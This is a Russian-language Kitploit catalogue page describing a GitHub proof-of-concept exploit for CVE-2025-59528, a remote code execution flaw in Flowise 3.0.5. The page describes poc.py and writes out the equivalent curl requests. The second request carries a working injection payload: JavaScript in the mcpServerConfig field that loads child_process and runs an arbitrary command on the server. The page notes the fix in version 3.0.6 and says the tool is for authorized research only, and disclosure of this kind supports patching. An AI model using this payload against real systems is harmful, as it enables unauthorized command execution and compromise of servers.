Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 Доказательство концепции | Kitploit
Инструменты/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 Доказательство концепции

Репозиторий
1374 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59528 PoC

Python-скрипт proof-of-concept для запуска RCE-пути CustomMCP в Flowise через POST /api/v1/node-load-method/customMCP.

⚠️ Только для образовательных целей и авторизованных исследований в области безопасности. Запуск этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет письменного разрешения, незаконен.

Автор

  • im-soohyun (Kim SooHyun)

Подробности

  • PoC для CVE-2025-59528
  • Затронутая версия: Flowise 3.0.5
  • Исправленная версия: Flowise 3.0.6
  • Ссылка: https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

Файлы

  • poc.py: запрашивает URL/IP машины, опциональный протокол при использовании голого хоста/IP, email, пароль и команду; выполняет вход, повторно использует cookie, затем отправляет сформированный CustomMCP запрос и выводит HTTP-статус, заголовки и тело ответа, аналогично curl -i

Использование

Запустите:

root@kitploit:~
python3 poc.py

Затем укажите:

  • URL/IP машины, например 10.10.11.10, http://10.10.11.10 или https://target.example
  • протокол, если будет запрошен для голого хоста/IP
  • email-адрес
  • пароль для учётной записи в целевом экземпляре Flowise
  • команда для выполнения на сервере

Эквивалент curl

1-й запрос

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

2-й запрос

root@kitploit:~
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'
Скачать инструмент